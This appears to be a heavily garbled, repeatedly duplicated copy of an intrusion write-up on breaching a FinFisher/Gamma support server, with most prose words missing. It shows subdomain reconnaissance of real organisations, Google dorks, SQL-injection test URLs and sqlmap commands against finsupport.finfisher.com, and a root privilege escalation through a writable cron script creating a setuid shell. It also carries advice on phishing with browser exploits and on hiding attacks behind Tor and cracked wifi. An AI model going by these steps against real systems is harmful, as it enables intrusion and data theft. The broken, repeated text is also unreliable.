fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
6. C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
7. C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

